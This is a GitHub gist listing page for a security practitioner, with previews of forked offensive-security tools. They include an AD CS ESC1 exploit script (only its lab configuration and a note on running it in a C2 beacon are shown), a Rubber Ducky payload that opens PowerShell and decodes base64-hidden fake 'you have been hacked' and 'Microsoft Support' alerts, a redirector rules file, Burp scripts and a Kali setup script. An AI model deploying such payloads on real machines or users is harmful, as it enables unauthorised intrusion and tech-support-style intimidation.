I hereby claim:
- I am hashtaginfosec on github.
- I am qasimchadhar (https://keybase.io/qasimchadhar) on keybase.
- I have a public key ASBG00neE1CBI5vv6ZKOMIk0m9nx82Cha0G_8lDiR9XT0wo
To claim this, I am signing this object:
Qasim hashtaginfosec
hashtaginfosec
/ .htaccess
Last active
August 22, 2023 03:10
— forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
| # | |
| # Note this version requires Apache 2.4+ | |
| # | |
| # Save this file into something like /etc/apache2/redirect.rules. | |
| # Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
| # | |
| # Include /etc/apache2/redirect.rules | |
| # |
hashtaginfosec
/ esc1.ps1
Created
July 18, 2023 00:53
— forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
hashtaginfosec
/ pyscripter_utils.py
Created
November 2, 2022 15:44
— forked from mgeeky/pyscripter_utils.py
Burp Python Scripter scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from burp import IScanIssue | |
| class CustomIssue(IScanIssue): | |
| def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'): | |
| self.HttpMessages=[BasePair] # list of HTTP Messages | |
| self.HttpService=BasePair.getHttpService() # HTTP Service | |
| self.Url=BasePair.getUrl() # Java URL | |
| self.Confidence = Confidence # "Certain", "Firm" or "Tentative" | |
| self.IssueBackground = IssueBackground # String or None | |
| self.IssueDetail = IssueDetail # String or None |
hashtaginfosec
/ SimpleDuckalert.txt
Created
August 24, 2022 20:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GUI r | |
| DELAY 20 | |
| STRING powershell | |
| ENTER | |
| DELAY 100 | |
| STRING $a = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("WQBvAHUAIABoAGEAdgBlACAAYgBlAGUAbgAgAGgAYQBjAGsAZQBkACEAIQAhAA==")) | |
| ENTER | |
| STRING $b = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("QwBvAG4AdABhAGMAdABpAG4AZwAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwB1AHAAcABvAHIAdAAuAA==")) | |
| ENTER | |
| STRING $c = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("UwB1AHMAcABlAGMAaQBvAHUAcwAgAGEAYwB0AGkAdgBpAHQAeQAgAGQAZQB0AGUAYwB0AGUAZAAhACEAIQA=")) |
hashtaginfosec
/ keybase.md
Created
October 13, 2017 14:27
hashtaginfosec
/ keybase.md
Last active
August 16, 2016 16:13
I hereby claim:
- I am qasimchadhar on github.
- I am qasimchadhar (https://keybase.io/qasimchadhar) on keybase.
- I have a public key whose fingerprint is 5DAD 5DFA 22E7 F95D 246B CF9E CDAD 9799 9EFE 0B7C
To claim this, I am signing this object:
hashtaginfosec
/ thpsetup.py
Created
July 18, 2016 20:28
— forked from oaass/thpsetup.py
This will install the additional tools to Kali recommended by "The Hacker Playbook". It will install the tools in /opt/tools
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "" | |
| echo "==========================================================================" | |
| echo "= Pentest Attack Machine Setup =" | |
| echo "= Based on the setup from The Hacker Playbook =" | |
| echo "==========================================================================" | |
| echo "" | |
| # Prepare tools folder |